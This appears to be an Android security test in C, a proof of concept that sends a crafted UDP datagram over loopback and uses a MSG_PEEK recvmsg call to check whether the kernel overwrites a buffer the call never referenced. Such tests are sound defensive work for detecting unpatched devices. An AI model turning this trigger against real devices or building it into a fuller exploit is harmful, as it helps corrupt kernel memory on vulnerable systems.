You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
99 lines
2.8 KiB
99 lines
2.8 KiB
/**
|
|
* Copyright (C) 2018 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
#include <sys/types.h>
|
|
#include <sys/wait.h>
|
|
#include <arpa/inet.h>
|
|
#include <netinet/in.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/wait.h>
|
|
#include <unistd.h>
|
|
|
|
#define EVIL_STRING "123456789\x00OVERWRITE\x00"
|
|
int udp_send()
|
|
{
|
|
int s;
|
|
struct sockaddr_in6 addr;
|
|
char data[160];
|
|
s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
|
|
memset(&addr, 0, sizeof(addr));
|
|
addr.sin6_family = AF_INET6;
|
|
addr.sin6_port = htons(43786);
|
|
inet_pton(AF_INET6, "::1", &(addr.sin6_addr));
|
|
sendto(s, "data", 4, 0, (struct sockaddr*)&addr, sizeof(addr));
|
|
memset(data, 0, sizeof(data));
|
|
memcpy(data, EVIL_STRING, sizeof(EVIL_STRING));
|
|
sendto(s, data, sizeof(data), 0, (struct sockaddr*)&addr, sizeof(addr));
|
|
return 0;
|
|
}
|
|
|
|
int udp_recv()
|
|
{
|
|
int s;
|
|
struct sockaddr_in6 addr;
|
|
struct msghdr msg;
|
|
struct iovec iov[2];
|
|
char buf1[10], buf2[10], buf3[10];
|
|
|
|
s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
|
|
memset(&addr, 0, sizeof(addr));
|
|
addr.sin6_family = AF_INET6;
|
|
addr.sin6_port = htons(43786);
|
|
inet_pton(AF_INET6, "::", &(addr.sin6_addr));
|
|
bind(s, (struct sockaddr*)&addr, 128);
|
|
|
|
memset(buf1, 0, sizeof(buf1));
|
|
memset(buf2, 0, sizeof(buf2));
|
|
memset(buf3, 0, sizeof(buf3));
|
|
memset(iov, 0, sizeof(iov));
|
|
memset(&msg, 0, sizeof(msg));
|
|
msg.msg_iov = iov;
|
|
msg.msg_iovlen = 2;
|
|
iov[0].iov_base = buf1;
|
|
iov[0].iov_len = sizeof(buf1);
|
|
iov[1].iov_base = buf2;
|
|
iov[1].iov_len = sizeof(buf2);
|
|
recvmsg(s, &msg, 0);
|
|
|
|
memset(buf1, 0, sizeof(buf1));
|
|
memset(buf2, 0, sizeof(buf2)); // buf2 is zeroed here.
|
|
memset(buf3, 0, sizeof(buf3));
|
|
memset(iov, 0, sizeof(iov));
|
|
memset(&msg, 0, sizeof(msg));
|
|
msg.msg_iov = iov;
|
|
msg.msg_iovlen = 1;
|
|
iov[0].iov_base = buf3;
|
|
iov[0].iov_len = sizeof(buf3);
|
|
recvmsg(s, &msg, MSG_PEEK); // No refrence to buf2 in this call.
|
|
|
|
printf("%s\n", buf2); // If buf2 has contents OVERWRITE, a vuln has occured.
|
|
return 0; // Exploit must occur in a forked process, return 113 won't work here.
|
|
}
|
|
|
|
int main()
|
|
{
|
|
pid_t send, recv;
|
|
int status = 0;
|
|
if ((recv = fork()) == 0)
|
|
exit(udp_recv());
|
|
sleep(1);
|
|
if ((send = fork()) == 0)
|
|
exit(udp_send());
|
|
for (pid_t pid = wait(&status); pid > 0; pid = wait(&status));
|
|
}
|